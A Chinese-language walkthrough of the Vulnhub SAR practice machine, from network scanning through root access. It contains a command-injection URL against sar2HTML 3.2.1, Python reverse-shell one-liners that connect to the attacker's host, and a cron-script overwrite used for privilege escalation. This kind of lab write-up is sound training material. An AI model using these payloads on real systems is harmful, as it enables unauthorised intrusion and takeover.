Vulnhub SAR靶场实战：从信息收集到Root提权全解析

1. 环境准备与靶机配置

在开始渗透测试之前，我们需要先搭建好实验环境。Vulnhub的SAR靶机是一个专门为渗透测试学习者设计的虚拟机，模拟了真实世界中的漏洞场景。我建议使用VMware Workstation或VirtualBox来运行这个靶机，这两种虚拟化平台都能很好地支持。

首先从Vulnhub官网下载SAR靶机的OVA文件。下载完成后，打开VMware选择"文件→打开"，导入下载好的OVA文件。这里有个小技巧：我习惯把靶机命名为"SAR-Target"以便区分，同时把虚拟机存储在我专门用于渗透测试的目录中。导入完成后，不要急着启动靶机，先进行网络配置。

右键点击靶机选择"设置"，在网络适配器中选择NAT模式。这里有个关键点：NAT模式能让靶机与你的攻击机处于同一网络，同时又不会干扰到物理网络中的其他设备。我遇到过不少初学者直接使用桥接模式，结果不小心扫描到了公司内网设备，这非常危险。配置完成后启动靶机，通常Ubuntu系统的靶机启动速度都很快。

2. 信息收集与目标识别

信息收集是渗透测试中最关键的阶段之一。我习惯先用一个简单的ping扫描来确认靶机是否在线：

ping -c 4 192.168.119.174

确认靶机响应后，开始使用nmap进行更全面的扫描。这里分享一个我常用的高效扫描命令：

nmap -T4 -A -v -p- 192.168.119.174

这个命令中，-T4表示加速扫描，-A启用操作系统和服务版本检测，-v显示详细输出，-p-扫描所有65535个端口。在实际测试中，我发现这个靶机只开放了80端口，这意味着Web应用将是我们的主要攻击面。

接下来使用dirsearch进行目录扫描，这个工具比传统的dirb更快速准确：

python3 dirsearch.py -u http://192.168.119.174 -e php,html,js -t 50

扫描结果中，/robots.txt文件特别值得关注。访问这个文件后，我们发现了一个关键目录/sar2HTML。这个目录下运行着一个名为sar2HTML的应用，版本号为3.2.1。经验告诉我，这种小众的Web应用往往存在已知漏洞。

3. 漏洞利用与初始访问

通过搜索sar2HTML 3.2.1的漏洞，我很快发现这个版本存在远程代码执行漏洞。这个漏洞的利用方式非常直接 - 通过plot参数注入系统命令：

http://192.168.119.174/sar2HTML/index.php?plot=;whoami

确认漏洞存在后，我们需要建立一个更稳定的shell连接。由于靶机上的netcat不支持-e参数，我选择使用Python反弹shell：

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.119.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在攻击机上，我们需要先启动一个监听器：

nc -nvlp 4444

执行漏洞利用后，我们成功获得了www-data用户的shell。这时候我通常会立即升级到更稳定的shell：

python3 -c 'import pty; pty.spawn("/bin/bash")'

4. 权限提升与Root访问

拿到初始shell后，我开始系统性地寻找提权途径。首先检查SUID权限的文件：

find / -perm -4000 -type f 2>/dev/null

没有发现可利用的SUID程序后，我转向检查计划任务：

cat /etc/crontab

发现一个有趣的配置：系统每5分钟以root身份执行/var/www/html/finally.sh。查看这个脚本，发现它只是简单地调用了同目录下的write.sh。而write.sh具有全局可写权限，这正是我们的突破口。

我将反弹shell的Python代码写入write.sh：

echo 'python3 -c '\''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.119.130",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'\''' > write.sh

在攻击机上启动新的监听器：

nc -nvlp 4445

等待不超过5分钟，我们就获得了root权限的shell。最后一步是获取flag：

cat /root/root.txt

在整个过程中，最重要的是保持耐心和系统性思考。每个步骤都需要仔细验证，特别是在写入反弹shell代码时，要特别注意引号的嵌套和转义，这是我曾经踩过多次的坑。